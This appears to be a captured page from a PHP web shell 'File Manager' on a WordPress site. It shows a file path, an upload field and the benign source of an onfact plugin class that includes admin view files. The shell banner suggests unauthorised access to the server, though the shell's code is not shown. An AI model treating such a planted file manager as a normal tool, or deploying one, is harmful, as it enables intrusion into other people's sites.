File Manager

Current Path : /webspace/www.beetasty.be/html/wp-content/plugins/onfact/
Upload File :
Current File : //webspace/www.beetasty.be/html/wp-content/plugins/onfact/class.onfact-views.php

<?php

/**
 * Class Onfact_Views
 *
 * Displays views for the Admin settings page.
 */
class Onfact_Views
{
    public static function __callStatic($name, $arguments)
    {
        return include(ONFACT__PLUGIN_DIR . 'views/' . DIRECTORY_SEPARATOR . $name . '.php');
    }

}

File Manager Version 1.0, Coded By Lucas
Email: hehe@yahoo.com